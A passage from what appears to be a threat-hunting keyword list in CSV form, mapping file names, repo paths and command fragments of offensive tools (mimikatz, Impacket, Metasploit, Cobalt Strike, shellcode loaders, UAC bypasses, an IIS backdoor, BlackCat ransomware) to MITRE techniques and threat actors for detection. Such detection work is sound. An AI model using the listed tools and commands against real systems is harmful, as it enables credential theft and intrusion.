the 'data' field of ICMP packets.,T1041 - T1001 - T1570,TA0011,N/A,N/A,Defense Evasion,https://github.com/s-h-3-l-l/katoolin3,1,0,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*icyguider/LightsOut*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*id::modify*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*IDiagnosticProfileUAC.git*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,1,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*IDiagnosticProfileUAC-main*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,1,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*Idov31/Jormungandr*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*idrac_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*idrac_default_user.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*IDSyscall.exe*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall.sln*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall.vcxproj*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall/IDSyscall*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*IDSyscall\IDSyscall*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*ie_execcommand_uaf.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ie_win_fakenotification-clippy*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ie_win_htapowershell.*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ie_win_missingflash-prettytheft*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*IERMTCBpbnRvIHByb2Nlc3MgOiA=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*if [ -f /tmp/tmpwatch ] * then*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*ifconfig * hw ether *,greyware_tool_keyword,ifconfig,change mac address with ifconfig,T1027,TA0002,N/A,N/A,Defense Evasion,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*ifconfig * hw ether *:*:*,greyware_tool_keyword,ifconfig,changing mac address with ifconfig,T1497.001 - T1036.004 - T1059.001,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,5,10,N/A,N/A,N/A,N/A -*ifconfig -a | grep * | xargs nmap -*,greyware_tool_keyword,nmap,Nmap Scan Every Interface that is Assigned an IP address,T1018 - T1046,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*ifnaibldjfdmaipaddffmgcmekjhiloa*,greyware_tool_keyword,FREE VPN DEWELOPMENT,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*igahhbkcppaollcjeaaoapkijbnphfhb*,greyware_tool_keyword,Social VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*IIS-Backdoor.*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*IIS-Raid-master*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,1,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*iisreset.exe /stop*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ikeforce.py*,offensive_tool_keyword,IKEForce,IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.,T1110 - T1201 - T1018,TA0001 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/SpiderLabs/ikeforce,1,1,N/A,N/A,3,226,73,2019-09-18T09:35:41Z,2014-09-12T01:11:00Z -*ikescan2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ILBypass.ps1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*imapattack.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*imapattack.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*imaprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*imaprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*imp_Badger*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-* *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-*.tar.gz*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*impacket.*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*'impacket.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.git*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.ldap*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.ntlm*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket.smbconnection*,offensive_tool_keyword,smbcrawler,SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares,T1077 - T1021 - T1110 - T1083,TA0002 - TA0008 - TA0009,N/A,N/A,Lateral Movement - Collection,https://github.com/SySS-Research/smbcrawler,1,1,N/A,N/A,2,129,13,2023-05-14T06:48:40Z,2021-06-09T19:27:08Z -*impacket/*.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket:latest*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket__init__*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket_findDelegation*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*impacket_rpcdump_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*impacket-atexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - 